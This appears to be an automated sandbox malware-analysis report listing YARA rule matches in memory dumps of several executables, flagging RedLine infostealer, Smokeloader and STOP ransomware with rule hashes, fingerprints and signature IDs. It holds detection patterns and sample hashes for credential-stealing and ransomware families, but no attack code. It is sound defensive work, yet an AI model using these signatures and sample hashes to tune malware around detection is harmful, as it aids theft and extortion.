Source: 00000011.00000003.657205781.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.572111296.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000011.00000002.803593297.0000000003E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000011.00000002.802780710.0000000002568000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000018.00000002.672529421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000018.00000002.672529421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.572121634.0000000002480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000002C.00000002.693972740.00000000041B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000016.00000002.671418165.0000000003FBC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000002.640494053.0000000004023000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000D.00000002.664431605.000000000400F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.572170619.00000000024CA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.636285582.0000000002460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000002.877619417.0000000004320000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000014.00000002.669374057.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.636523858.00000000025F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.637979878.0000000003F81000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.636377602.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000014.00000002.668986943.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000002.640576372.00000000040F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000015.00000002.678831039.0000000003E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000015.00000002.678506233.0000000002549000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.663886959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000A.00000002.663886959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001E.00000002.698879485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001E.00000002.698879485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.696312299.0000000003FD7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.638195133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000002.638195133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000007.00000002.636451401.0000000004140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000015.00000002.679075530.0000000003E81000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000011.00000002.801800101.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000D.00000002.666710830.0000000004120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000012.00000002.668248290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000012.00000002.668248290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000016.00000002.672588515.0000000004050000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000002C.00000002.693772578.0000000004028000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.635919053.0000000003FD8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.633865910.0000000003FE9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.673436142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000002.673436142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.697156815.0000000004180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E640.exe PID: 7032, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E640.exe PID: 7100, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 617B.exe PID: 7136, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 617B.exe PID: 3192, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 5274.exe PID: 6708, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 5274.exe PID: 6700, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: C474.exe PID: 6756, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 5274.exe PID: 2148, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: C474.exe PID: 476, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 5274.exe PID: 5080, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 5274.exe PID: 7048, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 5274.exe PID: 2788, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 5274.exe PID: 6836, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
